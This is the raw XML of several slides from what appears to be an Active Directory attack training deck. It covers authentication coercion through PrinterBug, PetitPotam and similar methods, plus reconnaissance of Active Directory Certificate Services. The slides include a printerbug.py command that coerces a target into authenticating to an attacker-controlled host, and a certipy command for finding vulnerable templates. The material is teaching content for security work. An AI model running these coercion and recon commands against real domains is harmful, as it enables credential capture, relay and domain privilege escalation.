          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113462" y="742906"/>
            <a:ext cx="6114407" cy="4068654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 13" descr="auth-coercion-3.drawio.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62C6C408-8B9B-4905-8EAF-C84A3BF80FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113462" y="742906"/>
            <a:ext cx="6114407" cy="4068654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124531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Authentication Coercion</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48</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518580"/>
            <a:ext cx="8799101" cy="2155577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>RPC-based Auth Coercion: Trigger RPC function -&gt; Auth Coercion -&gt; Downgrade + Crack / Relay </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> (MS-EFSRPC), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ShadowCoerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> (MS-FSRVP), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>DFSCoerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> (MS-DFSNM), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>PrinterBug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> (MS-RPRN), and more </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Attacker trigger function from MS-RPRN interface with specific parameters </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Target host authenticate to the attacker host with Net-NTLMv1/v2 "credentials"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Attacker host's SMB server captures the authentication hash (or attempt to downgrade) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Crack (NTLMv1) or Relay (NTLMv2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>python3 /opt/krbrelayx/printerbug.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>user:password@target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>yourIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>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0" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD8CBA51-FBB2-DFE0-E1BA-6CD623D52FCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1614328" y="2669229"/>
            <a:ext cx="5581434" cy="2148831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE72DD4-6D4A-5B43-A423-5CC8315120CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5311593" y="4806054"/>
            <a:ext cx="3635644" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1592445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 &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Active Directory Certificate Services (ADCS) Overview</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49</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5"/>
            <a:ext cx="3672241" cy="3614196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Active Directory Certificate Services (ADCS) is a Windows server role that implements public key infrastructure.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Broad Overview of ADCS:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Client generates a public/private keypair.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Client sends a certificate signing request to the enterprise CA server, and specifies a template to be used and the settings.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>CA checks if the user has permissions to enroll in the template and then authenticates and generates the certificate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> is a great tool for performing ADCS recon:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> find -u &lt;u&gt;@&lt;domain&gt; -p &lt;p&gt; -vulnerable -enabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C36B9D-CF36-F243-B92B-DA967E394F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3873212" y="4472144"/>
            <a:ext cx="5562047" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>Image From: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https://posts.specterops.io/certified-pre-owned-d95910965cd2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35908AE-5479-992C-1635-F8E0BA6016DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3969833" y="2022608"/>
            <a:ext cx="5113817" cy="2424513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C380D03-61A2-7CA0-476B-FE082772BC44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3965132" y="934033"/>
            <a:ext cx="5378206"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IBM Plex Sans" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Common Acronyms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PKI: Public Key Infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CA: Certificate Authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CSR: Certificate Signing Request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AD CS: Active Directory Certificate Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185897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3AC8-D532-9CD0-EFCF-AB811A3110F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218856" y="1787891"/>
            <a:ext cx="3776096" cy="1035496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:latin typeface="IBM Plex Sans Light"/>
              </a:rPr>
              <a:t>Precursor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2772920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203732" y="195814"/>
            <a:ext cx="9068753" cy="702690"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DA Privilege Escalation &gt; ADCS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Certificate Templates</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50</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338211" y="1268863"/>
            <a:ext cx="3463032" cy="2838188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>A certificate template is a blueprint of settings, options and permissions that can specified when generating a certificate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Some Options Include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Enrollment Permissions: Specify who can request a certificate with the template.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>PkiExtendedKeyUsage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>: Specifies what the certificate can be used for.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C36B9D-CF36-F243-B92B-DA967E394F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730360" y="4812423"/>
            <a:ext cx="3115514" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https://posts.specterops.io/certified-pre-owned-d95910965cd2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C962928-A8A9-4DCD-5B39-76A1033A06BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801243" y="1492616"/>
            <a:ext cx="5386637" cy="2221545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2936934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 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ADCS - Subject Alternative Names (SANs)</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51</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6"/>
            <a:ext cx="3842087" cy="578594"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Subject: Specifies the user that the certificate can be used to login as.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRP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8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C36B9D-CF36-F243-B92B-DA967E394F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4225462" y="4830509"/>
            <a:ext cx="4675509" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9304B63C-E93C-11B1-C71C-7F18B05E015B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770935" y="955845"/>
            <a:ext cx="4287558"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dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 9" descr="Capture.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4190BC5-D3A4-E698-3444-B8CD5D3A66A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="695429" y="1747838"/>
            <a:ext cx="2743200" cy="1384981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 11" descr="Capture.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9181FEC9-1B59-F498-39A1-20E1714FD79F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1782387"/>
            <a:ext cx="3982519" cy="1362756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
